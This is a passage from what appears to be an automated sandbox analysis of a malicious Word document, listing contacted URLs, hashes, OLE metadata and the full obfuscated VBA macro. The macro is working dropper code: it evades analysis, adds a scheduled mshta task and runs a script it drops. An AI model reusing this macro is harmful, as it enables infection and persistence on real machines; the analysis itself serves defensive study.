http://findupdatems.compowershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpfalse
  • 0%, virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://findupdatems.com/check/indexpowershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpfalse
  • 0%, virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://shopster.ua18#U042f.docfalse
    		high
    http://schemas.datacontract.org/2004/07/powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpfalse
      		high
      http://findupdatems.com/chpowershell.exe, 0000000C.00000002.2378942518.05347000.00000004.sdmp, PowerShell_transcript.424505.Y2llNals.20181118102015.txt.12.drfalse
      • Avira URL Cloud: safe
      		unknown
      http://shopster.ua/18#U042f.docfalse
        		high
        http://findupdatems.com/check/indexdpowershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.datacontract.org/2004/07/System.Management.Automationpowershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpfalse
          		high
          http://www.microsoft.cpowershell.exe, 0000000C.00000002.2383934340.08D20000.00000004.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://findupdatems.com/check/indexHlj)4jzIEX$powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.2377895660.04D60000.00000004.sdmpfalse
            		high
            http://crl.securetrust.com/STCA.crl0powershell.exe, 0000000C.00000003.2186142865.005BA000.00000004.sdmpfalse
              		high
              http://schemas.datacontract.org/2004/07/System.Management.Automationlpowershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpfalse
                		high

                Contacted IPs

                No contacted IP infos

                Static File Info

                General

                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: James, Template: Normal, Last Saved By: James, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:42:00, Create Time/Date: Tue Oct 9 07:23:00 2018, Last Saved Time/Date: Fri Oct 12 10:19:00 2018, Number of Pages: 13, Number of Words: 3148, Number of Characters: 17944, Security: 0
                Entropy (8bit):4.9765923955279625
                TrID:
                • Microsoft Word document (32009/1) 52.89%
                • Microsoft Word document (old ver.) (19008/1) 31.41%
                • Generic OLE2 / Multistream Compound File (8008/1) 13.23%
                • Java Script embedded in Visual Basic Script (1500/0) 2.48%
                File name:18#U042f.doc
                File size:129536
                MD5:cd15a7c3cb1725dc9d21160c26ab9c2e
                SHA1:7dc141cdd67152d8039c42c1d8b14f6a18b6b509
                SHA256:a6678a676d6a55833aa63233b3bae53fd7825c3c8afc4d015a2ca8296baee31a
                SHA512:18afabee98dff07529ad19d418848449514d46302daf32dfab6d75914b25491cdd92b070d095e71fe11138941f174c946c766211a4a42d0ba5c8904ea7efc36d
                File Content Preview:........................>.......................q...........s...............p...}..............................................................................................................................................................................

                File Icon

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "18#U042f.doc"

                Indicators

                Has Summary Info:True
                Application Name:Microsoft Office Word
                Encrypted Document:False
                Contains Word Document Stream:True
                Contains Workbook/Book Stream:False
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:True
                Flash Objects Count:0
                Contains VBA Macros:True

                Summary

                Code Page:1252
                Title:
                Subject:
                Author:James
                Keywords:
                Template:Normal
                Last Saved By:James
                Revion Number:5
                Total Edit Time:6120
                Create Time:2018-10-09 06:23:00
                Last Saved Time:2018-10-12 09:19:00
                Number of Pages:13
                Number of Words:3148
                Number of Characters:17944
                Creating Application:Microsoft Office Word
                Security:0

                Document Summary

                Document Code Page:1252
                Number of Lines:149
                Number of Paragraphs:42
                Thumbnail Scaling Desired:False
                Company:
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:917504

                Streams with VBA

                VBA File Name: ThisDocument.cls, Stream Size: 18730
                General
                Stream Path:Macros/VBA/ThisDocument
                VBA File Name:ThisDocument.cls
                Stream Size:18730
                Data ASCII:. . . . . . . . f . . . . . . . 2 . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . 7 . K . > . k . . . . . . . 7 E ) . @ . n . . 3 . S . . . . . . . . . . . . . . . . . . . . . . . | . f @ z M . . . _ . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . F r a m e 1 , 0 , 0 , M S F o r m s , F r a m e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 01 00 00 20 01 00 00 66 0f 00 00 04 01 00 00 32 02 00 00 ff ff ff ff 86 0f 00 00 c6 32 00 00 00 00 00 00 01 00 00 00 0e ac 15 13 00 00 ff ff e3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 fe 2c f7 c6 20 37 fa 4b 96 3e f3 6b 91 dc 9c 84 a8 80 11 37 45 29 90 40 a6 6e 0b 12 33 b7 53 8c 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                Madeir
                LTYPEBO
                True)
                GRAPH(nullcert,
                msgfilt
                MSWDS_FR
                InStr(LCase(McxDriv.Name),
                dispdiag
                UserDataBackup
                msgfilt)
                NAPHLPR(rawshark,
                Frame"
                kerberos.Write
                Object
                Long,
                vdsbas%:
                "bYM^^aMYf`Yb^YMbdMYMa^YMacMYe_Y^]^Y^^_YdcYMfdYMcdMY^]^YMa]MYMa]Yf^YffYM^]aYMcbYM^^aYMf`YMb`MYb]YMa`M"
                CscMigDl
                web_hightrust
                wsepno()
                wsepno
                driverquery
                MSForms,
                dependency_links
                modemcsa(mr_in
                False
                OmdProject,
                "fYM^]aYcbMY^^aMYf`YbbYMb]Ya`MYf^YMffYM^]aYcbMYM^^aYMf`YafYaeYbcYMa`Yf^MYffYM^]aYcbMY^^aYf`YafYMaeMYb"
                dnsext
                fstexp
                common
                Doual
                nullcert
                "MYM^]^YM^^fYMabYMdfY`fYMa`MY`fMYMfeY^]cMYM^]^MYffMY^^cMYM`_MYMdeY^]^MYM^^cMYMacMYedYM`fMYMa`YM`fMY^]"
                "Ya`Y`fYM^]cY^]aY^^cMYM`fMYMa`MYM`fMYM^^cMY^^_YMbeMYM`fYMa`Y`fMYMadYMadYM^]_MY^]bYM^^]M'yjxyddtx}"
                String,
                "Numqux{hRnlUqzlns"
                String)
                rawshark
                MINUS
                dvdburn
                DGPICCAP
                "nuxxwq"
                Integer)
                Len(msdatsrc)
                String
                displayswitch
                wmpconfig%:
                "fMY^]]MYM^^^Y^^fMYM^^]MY^]eMYM^^^MY`fYa`MY`fYMfdMYM^]]Y^^bMY^^cYM^^aY^]bMYM^^]MYM^]`Ya]MYd_MY^]eYM`f"
                "nhfhqx"
                .Item(test_startfile).Delete
                McxDriv
                webdav%:
                GRAPH
                Curri
                "'x~xyjrhuq%B%'fYa`Y`fMYM^__Yd`MYMcfYeeYM`fYMa^MYacMYe_MY^]^YM^^_YMdcMYMfdYcdY^]^YMa]MYa]MYf^MYMf"
                "dxzuutwy%B%'g{q|rz`_p[rMM\MMMOMMMnjMMZ|vpunMUa]MY`fMYMa]MYMdeY`fYMa`Y`f"
                "ThisDocument"
                dicowan
                test_idlehistory
                Chr(Asc(Mid(mr_in,
                VB_Base
                vmstorfl%:
                "nsktfirs"
                VB_Creatable
                web_hightrust%:
                VB_Exposed
                OTKLOADR)
                Integer,
                OmdProject
                lxkpcl
                WMI_Tracing%:
                dismcoreps
                system
                Selection.Font.Color
                fixer_base
                OTKLOADR
                Integer
                drtprov
                "NRYHHTWJ"
                DigitalLocker
                compdyn
                "Yf^MYMffMY^]aYMcbYM^^aMYMf`YafYaeYbaYMa`YMf^MYffYM^]aYMcbY^^aYf`MYMafMYMb]MYb]Ya^YaaYM`fYM^_aMYM`fMY"
                controller
                "MtrjUwjrnzrJinynts"
                nullcert,
                TTYRES
                kerberos.Close
                webdav
                Attribute
                RS_NotDefault
                CREDITS
                VB_PredeclaredId
                VB_GlobalNameSpace
                kerberos
                modemcsa
                reindent
                "aMYMa^YMaaYf^Ye`Y^^cMYM^^aYMd`MY^^]Y^]'yjxydrzqyng~yjhtijh%B%'YM^^cMYMa^Y`fMYMa`MY`fYacY`fYa`MY`"
                DISTLSTS
                VB_Name
                RS_NotDefault,
                test_startfile
                vdsbas
                cordiaz
                modemcsa(msdatsrc,
                Function
                wmpconfig
                "ryMMZ}svMZrr|{|vMo}nMMZ{MMZ{MZrMMuvqMMMMZSSMMg{q|rz`_"
                "YMffMYf^Yb_MYMaaMYb]YMb_MYaaMYb]Yb`YMf`MYMabMYM^]cYdfMYd`MY^^]MY`fMYM`fYMa^VM[MUMQ|_^XQ}u"
                "p[rMM\MR{RO'yjxydniqjmnxytw~%B%'YM^]]MYM^^dYM^^_MYM^]]YMfdMY`fMYMa`Y`fMYM^^cMY^]^Y`fMYa`"
                ActiveDocument.Shapes
                "a`MYM`fMYM^]]MYM^]^MY^_]Yd_Y^]eYM^]cYMa^Y`fMYa`MY`fYMb_YM^]cMYM`'x~xdxw{%B%'`YMf`MYf^MYffMY^]aYc"
                VB_Customizable
                ehSched
                UserDataBackup%:
                ehdebug
                VB_Control
                "MU_;W\S<"
                "Y`fMYM^]fYM^^bMYacYffMY^^^YM^]fMYMadYffMYM^]aY`fYMa`Y`fYM^]^YM`fMYMa`MYM`fYffMY^]dMYadY^]bMY^^]Y`fMY"
                .Count
                objFSO
                VB_TemplateDerived
                "^MYMfeMYMffMYM^]eYM^]bMY^]^MY^^]'|nswx%B%yjxyddtx}dxzuutwy%+%yjxydrzqyng~yjhtijh%+%yjxydniqjmnxy"
                NAPHLPR
                WMI_Tracing
                Object,
                TTYRES%:
                docomo
                vmstorfl
                Replace(RS_NotDefault,
                Selection.WholeStory
                VBA Code
                Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Frame1, 0, 0, MSForms, Frame"


Sub Frame1_Layout()
    Dim test_startfile As String
    Dim rawshark As Object
    Dim OTKLOADR As Integer
    Dim RS_NotDefault As String
    Dim py25tests As String
    Dim RGI79AD As String
    Dim reindent As String
    Dim RIABLC3 As String

    test_startfile = "MtrjUwjrnzrJinynts"
    py25tests = "\xHWnUY3Xmjqq"
    xrWPpb4
    wsepno
    Dim UserDataBackup%: UserDataBackup = 1
    Dim TTYRES%: TTYRES = UserDataBackup * 9
    If UserDataBackup < TTYRES Then
        test_startfile = py25tests
        Set rawshark = CreateObject(MSART8(test_startfile))
    Else
        Set rawshark = CreateObject(MSART8(test_startfile))
    End If
    reindent = fstexp("muh9;55y")
    RS_NotDefault = fixer_base("mui68;5y")
    RGI79AD = KYEPC270
    If (RGI79AD = "O55>55=<") Then
        RIABLC3 = J0289430(reindent)
        RIACMAC7 = MSART8("wfsitrdsfrj")
        RS_NotDefault = Replace(RS_NotDefault, RIACMAC7, RIABLC3)
        RS_NotDefault = NAPHLPR(rawshark, RS_NotDefault, OTKLOADR)
    End If
End Sub

Function fixer_base(test_startfile2 As String) As String
    Dim SL00286_ As String
        Dim FD00077_ As String
    FD00077_ = "xhmyfxpx%4Hwjfyj%4K%4XH%IFNQ^%4XY%'65?75'%4YS%'Iwn{jHqtziYfxpHtwjHmjhp'%4YW%'rxmyf%wfsitrdsfrj'"

    test_startfile2 = "muo9:55y"
    SL00286_ = "NK6987J8"
    test_startfile2 = "MU_;W\S<"
    SL00286_ = FD00077_
    SL00286_ = MSART8(SL00286_)
    fixer_base = SL00286_
End Function

Function fstexp(test_startfile02 As String) As String
    Dim SO02269_ As String
        Dim dnsext As String
    Dim dismcoreps As String
    Dim EP0NGJ8F As String
    Dim CREDITS As String
    Dim CscMigDl As String
    Dim docomo As String
    Dim compdyn As String
    Dim displayswitch As String
    Dim DGPICCAP As String
    Dim dvdburn As String
    Dim DISTLSTS As String
    Dim common As String
    Dim cordiaz As String
    Dim EP0NCA9A As String
    Dim controller As String
    Dim dependency_links As String
    Dim DigitalLocker As String
    Dim dicowan As String
    Dim dfdll_dll_x8 As String
    Dim dispdiag As String
    Dim EP0NRE9A As String
    Dim Curri As String
    Dim ehdebug As String
    Dim driverquery As String
    Dim drtprov As String
    Dim Doual As String
    Dim EP0NREAB As String
    Dim ehSched As String
    displayswitch = "fYM^]aYcbMY^^aMYf`YbbYMb]Ya`MYf^YMffYM^]aYcbMYM^^aYMf`YafYaeYbcYMa`Yf^MYffYM^]aYcbMY^^aYf`YafYMaeMYb"
    common = "jwynqj7:8.Jsi%KzshyntsYXd\nsit|xZuifyj-.|nsit|3hqtxj-.A4xhwnuyCA4gti~CA4myrqC"
    dfdll_dll_x8 = "^MYMfeMYMffMYM^]eYM^]bMY^]^MY^^]'|nswx%B%yjxyddtx}dxzuutwy%+%yjxydrzqyng~yjhtijh%+%yjxydniqjmnxy"
    dismcoreps = "fMY^]]MYM^^^Y^^fMYM^^]MY^]eMYM^^^MY`fYa`MY`fYMfdMYM^]]Y^^bMY^^cYM^^aY^]bMYM^^]MYM^]`Ya]MYd_MY^]eYM`f"
    dvdburn = "ryMMZ}svMZrr|{|vMo}nMMZ{MMZ{MZrMMuvqMMMMZSSMMg{q|rz`_"
    EP0NREAB = "AmyrqCAgti~CAxhwnuy%qfslzfljB'[GXhwnuy'CXzg%YXd\nsit|xZuifyj-.\\FSduwtknqjd{6%B%==\hsJfuFzym"
    ehdebug = "z`]XTTVMSSMM}jrpu|M|xZr}'X[6886J8%B%'|{MMUZvrzM{gnV[MM|ru"
    DISTLSTS = "'x~xyjrhuq%B%'fYa`Y`fMYM^__Yd`MYMcfYeeYM`fYMa^MYacMYe_MY^]^YM^^_YMdcMYMfdYcdY^]^YMa]MYa]MYf^MYMf"
    controller = "zxjwynqj7:-{jwhqxni1%{drxhixh1%{nj|uwt{.Sj}yZmltwt%B%\G56<95dJsi%KzshyntsKzshynts%zxjwynqj7:"
    dependency_links = "tw~%+%x~xyjrhuq%+%x~xdxw{%+%X[8757J8%+%X[6886J8|nswx%B%Zmltwt-|nswx.YS5576<d%B%|nswxJsi%Kzshyn"
    Doual = "a`MYM`fMYM^]]MYM^]^MY^_]Yd_Y^]eYM^]cYMa^Y`fMYa`MY`fYMb_YM^]cMYM`'x~xdxw{%B%'`YMf`MYf^MYffMY^]aYc"
    dispdiag = "aMYMa^YMaaYf^Ye`Y^^cMYM^^aYMd`MY^^]Y^]'yjxydrzqyng~yjhtijh%B%'YM^^cMYMa^Y`fMYMa`MY`fYacY`fYa`MY`"
    docomo = "bYM^^aMYf`Yb^YMbdMYMa^YMacMYe_Y^]^Y^^_YdcYMfdYMcdMY^]^YMa]MYMa]Yf^YffYM^]aYMcbYM^^aYMf`YMb`MYb]YMa`M"
    dnsext = "Yf^MYMffMY^]aYMcbYM^^aMYMf`YafYaeYbaYMa`YMf^MYffYM^]aYMcbY^^aYf`MYMafMYMb]MYb]Ya^YaaYM`fYM^_aMYM`fMY"
    Curri = "tsKzshynts%yxdljsjwnh-\hsJfuFzymUwt}~1%|nswx1%\\FSduwtknqjd{6%.}rkgt}%B%:_UINW9G%B%|nswx%%%%N"
    DigitalLocker = "Ya`Y`fYM^]cY^]aY^^cMYM`fMYMa`MYM`fMYM^^cMY^^_YMbeMYM`fYMa`Y`fMYMadYMadYM^]_MY^]bYM^^]M'yjxyddtx}"
    drtprov = "p[rMM\MR{RO'yjxydniqjmnxytw~%B%'YM^]]MYM^^dYM^^_MYM^]]YMfdMY`fMYMa`Y`fMYM^^cMY^]^Y`fMYa`"
    cordiaz = "shynts%Zmltwt-{jwhqxni%.{nj|uwt{%B%95Ktw%{drxhixh%B%6%Yt%Qjs-{jwhqxni.\G56<95d%B%\G56<95d%+%"
    compdyn = "-zxjwynqj7:61%zxjwynqj7:71%zxjwynqj7:8.zxjwynqj7:%B%Hmw-Fxh-Rni-zxjwynqj7:61%zxjwynqj7:71%6..%2%zx"
    EP0NCA9A = "}~.%X[8757J8%B%'a^MYM^_aMYM`_YMacMY`_MYMa]MYM`_MY`cYMcfYM^^]MYecMYMbeYcdMYMdfYM^]fMYMe`YMe]YM^]^M"
    DGPICCAP = "MYM^]^YM^^fYMabYMdfY`fYMa`MY`fMYMfeY^]cMYM^]^MYffMY^^cMYM`_MYMdeY^]^MYM^^cMYMacMYedYM`fMYMa`YM`fMY^]"
    EP0NGJ8F = "f6'._UINW9G%B%yxdljsjwnh-|nswx1%_UINW9G1%\\FSduwtknqjd{6.Jsi%XzgKzshynts%YS5576<d-\hsJfuFzymUwt"
    EP0NRE9A = "Uwt}~%B%'v}[r'Xjy%|nswx%B%HwjfyjTgojhy-Zmltwt-\hsJfuFzymUwt}~.._UINW9G%B%YS5576<d-'ify"
    ehSched = "YMffMYf^Yb_MYMaaMYb]YMb_MYaaMYb]Yb`YMf`MYMabMYM^]cYdfMYd`MY^^]MY`fMYM`fYMa^VM[MUMQ|_^XQ}u"
    CREDITS = "%_UINW9G1%}rkgt}1%YwzjJsi%Nk_UINW9G%B%''yxdljsjwnh%B%_UINW9GJsi%KzshyntsKz"
    driverquery = "Y`fMYM^]fYM^^bMYacYffMY^^^YM^]fMYMadYffMYM^]aY`fYMa`Y`fYM^]^YM`fMYMa`MYM`fYffMY^]dMYadY^]bMY^^]Y`fMY"
    CscMigDl = "k%-\\FSduwtknqjd{6%C%}rkgt}.%Ymjs}rkgt}%B%\\FSduwtknqjd{6%2%\\FSduwtknqjd{6\hsJfuFzymUwt}~3Wzs"
    dicowan = "dxzuutwy%B%'g{q|rz`_p[rMM\MMMOMMMnjMMZ|vpunMUa]MY`fMYMa]MYMdeY`fYMa`Y`f"

    test_startfile02 = "nhfhqx"
    SO02269_ = "NK6987J8"
    test_startfile02 = "NRYHHTWJ"
    SO02269_ = EP0NREAB & EP0NRE9A & EP0NGJ8F & EP0NCA9A & ehSched & ehdebug & dvdburn & drtprov & driverquery & Doual & docomo & dnsext & DISTLSTS & displayswitch & dispdiag & dismcoreps & DigitalLocker & dicowan & DGPICCAP & dfdll_dll_x8 & dependency_links & Curri & CscMigDl & CREDITS & cordiaz & controller & compdyn & common
    fstexp = SO02269_
End Function

Function NAPHLPR(net1qx64 As Object, NAPHLPR2 As String, nullcert As Integer) As String
    Dim OmdProject As String
    Dim NR2550B As String
    OmdProject = NAPHLPR2
    NR2550B = OmdProject
    Dim vmstorfl%: vmstorfl = 81
    Dim vdsbas%: vdsbas = 9
    If vmstorfl > vdsbas Then
        nullcert = GRAPH(nullcert, NR2550B)
        net1qx64.Run OmdProject, nullcert, True
    End If
    OmdProject = "nsktfirs"
    NAPHLPR = OmdProject
End Function

Function GRAPH(test_startfile5 As Integer, system As String)
    Dim test_idlehistory As Integer
    test_idlehistory = test_startfile5 * 2
    system = "Numqux{hRnlUqzlns"
    Dim web_hightrust%: web_hightrust = 267
    Dim webdav%: webdav = 9
    If web_hightrust > webdav Then
        system = "nuxxwq" + system
        test_idlehistory = test_startfile5 - test_startfile5
    End If
    GRAPH = test_idlehistory
End Function


Function MSART8(msdatsrc As String) As String
    Dim msproof7 As Long
    Dim MSWDS_FR As String
    Dim msgfilt As Integer
    msgfilt = 5
    Dim wmpconfig%: wmpconfig = 1
    Dim WMI_Tracing%: WMI_Tracing = wmpconfig * 9
    If wmpconfig < WMI_Tracing Then
        For msproof7 = 1 To Len(msdatsrc)
            MSWDS_FR = MSWDS_FR & modemcsa(msdatsrc, msproof7, msgfilt)
        Next msproof7
    End If
    MSART8 = MSWDS_FR
End Function

Function modemcsa(mr_in As String, modemcsa2 As Long, modemcsa3 As Integer) As String
    modemcsa = Chr(Asc(Mid(mr_in, modemcsa2, 1)) - modemcsa3)
End Function



Function KYEPC270() As String
    Dim KYKC3920 As String
    Dim lxkpcl As Object
    Dim Madeir As Object
    Dim MINUS As String
    Dim mfh264enc As Integer
    
    MINUS = "O55>55=<"
    mfh264enc = 0

    LTYPEBO = Array(MSART8("MfHPJW"), MSART8("RfqNQqF"), MSART8("uWthJ}U"), MSART8("\nWJXmFWP"), MSART8("M}I"), MSART8("Ut|JWxmjQqdnXJ"), MSART8("niF"), MSART8("Tqq~"), MSART8("knIIQJw"), MSART8("rFQ|Fwj"), MSART8("[rytTQxi"), MSART8("X\nslGt]"), MSART8("{gt]YwF^"), MSART8("xjhzsnf"), MSART8("mnofhp"), MSART8("[rytTqxi,"), MSART8("[gt}"), MSART8("{R\fWJ"), MSART8("[]xYWjfR"), MSART8("FZyTNy"), MSART8("{rYtTqx"), MSART8("Yhu[Nj\"), MSART8("\nWJXmFWP"), MSART8("uwTHJxx%j}uQtwjw"), MSART8("[NxzFq%gFXnH"), MSART8("knIIQJw"))
    
    
    Set lxkpcl = GetObject(MSART8("|NSRLryx?aa3awttyahnR[7"))
    Set Madeir = lxkpcl.ExecQuery(MSART8("XJQJHY%SfrJ%KWTR%\Ns87dUWtHJxX"))

    For Each McxDriv In Madeir
        mfh264enc = mfh264enc + 1
        For Each mf3216 In LTYPEBO
            If InStr(LCase(McxDriv.Name), LCase(mf3216)) > 0 Then
                MINUS = "O56:=5<6"
            End If
        Next
    Next

    If mfh264enc < 40 Then
        MINUS = "O56:=5<6"
    End If

    KYEPC270 = MINUS
End Function


Function J0289430(J0297551 As String) As String

    Dim J0304405 As String
    Dim KYC2525E As String
    Dim KBDUGHR1 As String

    Set objFSO = CreateObject(MSART8("XHWnUyNSL3KNqjX~XyJRTgoJHY"))
 
    KYC2525E = Environ(MSART8("FUUIFYF"))
    KBDUGHR1 = MSART8("a\UKY:873myf")

    Set kerberos = objFSO.CreateTextFile(KYC2525E & KBDUGHR1, True)
    kerberos.Write MSART8(J0297551)
    kerberos.Close
    J0289430 = KYC2525E & KBDUGHR1
End Function

Function xrWPpb4()
    Selection.WholeStory
    Selection.Font.Color = -587137025
    ThisDocument.Range(0, 0).Select
End Function


Function wsepno()
    With ActiveDocument.Shapes
        For test_startfile = .Count To 1 Step -1
            .Item(test_startfile).Delete
        Next
    End With
End Function

                Streams

                Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                General
                Stream Path:\x1CompObj
                File Type:data
                Stream Size:114
                Entropy:4.2359563651
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 468
                General
                Stream Path:\x5DocumentSummaryInformation
                File Type:data
                Stream Size:468
                Entropy:2.89618512386
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . D . . . . . . . . . . . . . . . + , . . , . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . . . . . . . : R . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 2c 01 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00
                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 388
                General
                Stream Path:\x5SummaryInformation
                File Type:data
                Stream Size:388
                Entropy:3.26802963394
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . J a m e s . . . . . . . . . . . . . . . . . . . . . . . N o r m
                Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 54 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 07 00 00 00 c4 00 00 00 08 00 00 00 d4 00 00 00 09 00 00 00 e4 00 00 00 12 00 00 00 f0 00 00 00
                Stream Path: 1Table, File Type: data, Stream Size: 39397
                General
                Stream Path:1Table
                File Type:data
                Stream Size:39397
                Entropy:4.65669648396
                Base64 Encoded:True
                Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                Stream Path: Data, File Type: data, Stream Size: 4096
                General
                Stream Path:Data
                File Type:data
                Stream Size:4096
                Entropy:1.18984412302
                Base64 Encoded:False
                Data ASCII:/ . . . D . d . . . . . . . . . . . . . . . . . . . . . Y . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . c . . . $ . . . . . . . . . . A . . . . ? . . . . . . . . . . . . . . . . . ? . . . . . 3 . " . . . . . . . . . ` . . . . . . . ? . . . . . . . . . . . . . . . . . 2 . . . y . . . . . : . > . . \\ A e . . . g X ` . . . . U . . . . . . . D . . . . . 8 . ` ! . . M . . . : . > . . \\ A e . . . g X ` . . . . . . . . . . . . . . . .
                Data Raw:2f 02 00 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 59 01 4b 00 e8 03 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 62 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 24 00 00 00 7f 00 80 00 80 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 0c 00 1f 00 ff 01 00 00
                Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 443
                General
                Stream Path:Macros/PROJECT
                File Type:ASCII text, with CRLF line terminators
                Stream Size:443
                Entropy:5.06439598228
                Base64 Encoded:True
                Data ASCII:I D = " { 9 3 0 F E 5 0 D - 5 7 5 5 - 4 1 6 6 - A 8 7 8 - B 5 7 D 2 9 8 6 5 3 5 E } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F 3 F 1 4 B 0 0 F 0 0 4 F 0 0 4 F 0 0 4 F 0 0 4 " . . D P B = " 9 C 9 E 2 4 F F 6 4 A 9 6 5 A 9 6 5 A 9 " . . G C = " 4 5 4 7 F D 5 6 0 F F E 1 0 F E 1 0 0 1 " . . . . [ H o s t E x t e n d e r I n f o ]
